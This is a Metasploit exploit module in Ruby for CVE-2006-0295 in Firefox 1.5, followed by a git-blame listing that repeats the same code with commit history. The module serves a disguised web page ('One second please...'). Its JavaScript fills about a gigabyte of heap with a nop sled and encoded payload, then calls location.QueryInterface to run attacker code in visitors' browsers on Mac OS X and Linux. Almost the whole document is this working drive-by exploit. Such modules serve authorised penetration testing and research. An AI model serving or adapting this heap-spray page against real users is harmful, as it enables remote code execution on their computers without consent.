modules/exploits/multi/browser/firefox_queryinterface.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Firefox location.QueryInterface() Code Execution',
      'Description'    => %q{
          This module exploits a code execution vulnerability in the Mozilla
        Firefox browser. To reliably exploit this vulnerability, we need to fill
        almost a gigabyte of memory with our nop sled and payload. This module has
        been tested on OS X 10.3 with the stock Firefox 1.5.0 package.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>  ['hdm'],
      'References'     =>
        [
          ['CVE', '2006-0295'],
          ['OSVDB', '22893'],
          ['BID', '16476'],
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
        ],
      'Payload'        =>
        {
          'Space'    => 1000 + (rand(256).to_i * 4),
          'BadChars' => "\x00",
        },
      'Platform'       => %w{ osx linux },
      'Targets'        =>
        [
          [ 'Firefox 1.5.0.0 Mac OS X',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC
            }
          ],

          [ 'Firefox 1.5.0.0 Linux',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DisclosureDate' => '2006-02-02'
      ))
  end

  def on_request_uri(cli, request)

    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    print_status("Sending #{self.name}")
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
    handler(cli)
  end

  def generate_html(payload)

    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
    enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))

    return <<-EOF
<html>
<head>
<title>One second please...</title>
<script language="javascript">

function BodyOnLoad() {
  h = FillHeap();
  location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
};

function FillHeap() {
  // Filler
  var m = "";
  var h = "";
  var a = 0;

  // Nop sled
  for(a=0; a<(1024*256); a++)
    m += unescape("#{enc_nops}");

  // Payload
  m += unescape("#{enc_code}");

  // Repeat
  for(a=0; a<1024; a++)
    h += m;

  // Return
  return h;
}
</script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>
EOF
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = NormalRanking`
Retab modules 2013-08-30 16:28:54 -05:00
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`#`
			`# This module acts as an HTTP server`
			`#`
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpServer::HTML`
Retab modules 2013-08-30 16:28:54 -05:00
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`'Name' => 'Firefox location.QueryInterface() Code Execution',`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module exploits a code execution vulnerability in the Mozilla`
			`Firefox browser. To reliably exploit this vulnerability, we need to fill`
			`almost a gigabyte of memory with our nop sled and payload. This module has`
			`been tested on OS X 10.3 with the stock Firefox 1.5.0 package.`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`},`
			`'License' => MSF_LICENSE,`
Other licensing updates (MSF->BSD) and minor cleanups 2006-05-06 16:43:45 +00:00			`'Author' => ['hdm'],`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'References' =>`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`[`
			`['CVE', '2006-0295'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '22893'],`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`['BID', '16476'],`
			`['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],`
			`],`
			`'Payload' =>`
			`{`
			`'Space' => 1000 + (rand(256).to_i * 4),`
			`'BadChars' => "\x00",`
			`},`
Bug #8419 - Added platform info missing on exploits 2013-10-08 22:41:50 -04:00			`'Platform' => %w{ osx linux },`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`'Targets' =>`
			`[`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`[ 'Firefox 1.5.0.0 Mac OS X',`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`{`
			`'Platform' => 'osx',`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Arch' => ARCH_PPC`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`}`
			`],`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`[ 'Firefox 1.5.0.0 Linux',`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`{`
			`'Platform' => 'linux',`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Arch' => ARCH_X86,`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`}`
			`],`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2006-02-02'`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`))`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`def on_request_uri(cli, request)`
Retab modules 2013-08-30 16:28:54 -05:00
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`# Re-generate the payload`
			`return if ((p = regenerate_payload(cli)) == nil)`
Retab modules 2013-08-30 16:28:54 -05:00
Remove spurious cli.peerhost in output 2012-04-20 13:31:42 -06:00			`print_status("Sending #{self.name}")`
API change for the HTML mixin, the send_response method is no longer overloaded, instead exploits must call send_response_html to enable HTML evasion. The old method caused problems when a exploit needed HTML and non-HTML response capabilities 2006-12-10 03:26:53 +00:00			`send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`handler(cli)`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Mods 2006-03-12 02:06:57 +00:00			`def generate_html(payload)`
Retab modules 2013-08-30 16:28:54 -05:00
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))`
			`enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))`
Retab modules 2013-08-30 16:28:54 -05:00
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`return <<-EOF`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`<html>`
			`<head>`
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`<title>One second please...</title>`
			`<script language="javascript">`

			`function BodyOnLoad() {`
			`h = FillHeap();`
			`location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));`
			`};`

			`function FillHeap() {`
			`// Filler`
			`var m = "";`
			`var h = "";`
			`var a = 0;`
Fix: whitespaces, svn propset, author e-mail format 2011-11-06 22:02:26 +00:00
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`// Nop sled`
			`for(a=0; a<(1024*256); a++)`
			`m += unescape("#{enc_nops}");`
Fix: whitespaces, svn propset, author e-mail format 2011-11-06 22:02:26 +00:00
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`// Payload`
			`m += unescape("#{enc_code}");`
Fix: whitespaces, svn propset, author e-mail format 2011-11-06 22:02:26 +00:00
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`// Repeat`
			`for(a=0; a<1024; a++)`
			`h += m;`
Fix: whitespaces, svn propset, author e-mail format 2011-11-06 22:02:26 +00:00
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`// Return`
			`return h;`
			`}`
			`</script>`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`</head>`
			`<body onload="BodyOnLoad()">`
			`</body>`
			`</html>`
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`EOF`
More aux, first hack on multi-target firefox exploit 2006-03-09 17:32:53 +00:00			`end`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`end`